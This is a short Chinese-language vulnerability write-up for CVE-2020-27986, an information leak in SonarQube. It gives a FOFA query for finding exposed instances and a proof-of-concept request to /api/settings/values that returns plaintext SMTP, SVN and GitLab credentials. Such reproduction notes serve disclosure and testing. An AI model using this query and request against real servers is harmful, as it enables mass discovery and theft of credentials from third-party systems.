# SonarQube api 信息泄露漏洞 CVE-2020-27986
## 漏洞描述
SonarQube 某接口存在信息泄露漏洞,可以获取部分敏感信息
## 漏洞影响
> [!NOTE]
>
> SonarQube
## FOFA
> [!NOTE]
>
> app=”sonarQube-代码管理”
## 漏洞复现
主页如下
![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/1.png)
漏洞POC
“`
http://xxx.xxx.xxx.xxx/api/settings/values
“`
![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/2.png)
可泄露的为:明文SMTP、SVN和Gitlab等敏感信息
![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/3.png)
## Goby & POC
> [!NOTE]
>
> SonarQube api Information leakage
![](/static/qingy/SonarQube_api_信息泄露漏洞_CVE-2020-27986/img/4.png)
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容